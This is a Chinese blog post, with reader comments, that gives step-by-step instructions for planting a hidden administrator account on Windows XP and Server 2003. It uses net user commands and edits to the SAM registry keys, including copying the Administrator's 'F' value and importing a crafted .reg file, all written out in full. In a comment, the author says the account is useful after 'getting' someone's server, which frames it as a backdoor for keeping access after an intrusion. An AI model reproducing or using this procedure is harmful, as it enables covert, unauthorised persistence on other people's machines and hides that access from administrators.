在 XP 和 Windows Server 2003 中创建具有超级管理权限的隐藏超级用户的方法

在 XP 和 Windows Server 2003 中创建具有超级管理权限的隐藏超级用户的方法
如果我们希望建立一个一般情况下看不到的隐藏账户,那么可以这么做。(为什么这么做?如果你需要,你自会懂的)

1、打开命令提示符,先建立 123$ 用户:
c:>net user 123$ 123abc /add
注:用户名为123$,后面加符号$是为了使其在控制台下用 net user命令看不到。

2、运行regedt32.exe(有人会提醒这里要注意不是regedit.exe,但其实在 Windows XP 和 Windows Server 2003 中,Regedt32.exe 只是一个用来运行 Regedit.exe 的小程序<解释来源于微软技术支持中心>),先找到HKEY_LOCAL_MAICHINESAMSAM 点击它 ,然后在菜单”安全”->”权限” 添加自己现在登录的帐户或组,把”权限”->”完全控制”->”允许”打上勾,然后确定。
这样操作后,再按F5刷新一下,就可看到已经可以直接读取本地sam的信息了。

3、打开键 HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernames123$,查看其默认键值为”0x3f1″(注意这里可能显示不同,下面导出项目应于此处对应!),于是相应导出如下键值:
HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernames123$ 导出并命名为123$.reg
HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersF1 导出并命名为 3f1.reg
HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersF4 导出并命名为 lf4.reg (Administrators的相应键)

4、用记事本打开lf4.reg 找到如下的”F”的值,比如类似如下:

“F”=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,
00,00,00,00,00,00,00

复制该部分,然后打开3f1.reg,找到”F”的值并替换。

5、打开123$.reg,把里面的内容类似如下面这段复制一下:

[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames123$]
@=hex(3f1):

6、再次编辑文件3f1.reg,粘贴上面复制的内容到文件最后。生成的文件内容类似如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersF1]
“F”=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,
00,00,00,00,00,00,00
“V”=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,
00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,
14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,
01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,
00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,
00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,
08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,
00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,
00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,
00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,
00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,
00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,
00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,
00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,
00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,
e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,
00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,
00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,
4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,
76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,
ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,
fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,
37,f1,02,cf,01,00,01,00,01,00,01,00

[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames123$]
@=hex(3f1):

7、命令提示符下将123$用户删除:

c:>net user 123$ /delete

8、双击我们已经修改好的3f1.reg文件导入进注册表。
9、最后找到HKEY_LOCAL_MAICHINESAMSAM 点击它 ,然后在菜单”安全”->”权限” 删除刚才添加的帐号(即解除刚赋予其的完全控制权限)

10、注销当前用户,用 123$/123ABC登陆,就会是是最高权限的隐藏账号了。

这样就建立了一个在控制台用 net user 和”计算机管理”中都看不到的帐户123$,。记着第一次就把密码设置好,之后不要改密码,否则隐藏即会失效。

点赞 (0)
  1. winio说道:

    噢,我从来都是用guest,当然是添加到了administrator组的。从命令行下激活,设置密码。用户账户里边还是显示的禁用。其实是一个超级管理员。

  2. 离心机说道:

    哇噻,博主好强,回头试试

  3. 遥控飞机说道:

    来支持下了 回头我也去试试

  4. 顺水横流说道:

    [quote=rshuo]使用WIN7
    任侠 于 2011-06-20 08:51 AM 回复这个,未曾尝试,回头试验下!

    同是WIN7

  5. 威言威语说道:

    感觉有点复杂,隐藏超级用户貌似没有太大用处。
    [reply=任侠,2011-06-20 08:50 AM]没用处,那是因为你还没遇到需要用的时候。比如你“拿”到了一台服务器之后。。。[/reply]

  6. 木本无心说道:

    我懂的,隐藏的,还超级!
    [reply=任侠,2011-06-20 08:51 AM]真的懂啦?其实操作起来很简单的[/reply]

  7. rshuo说道:

    使用WIN7
    [reply=任侠,2011-06-20 08:51 AM]这个,未曾尝试,回头试验下![/reply]

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注

Captcha Code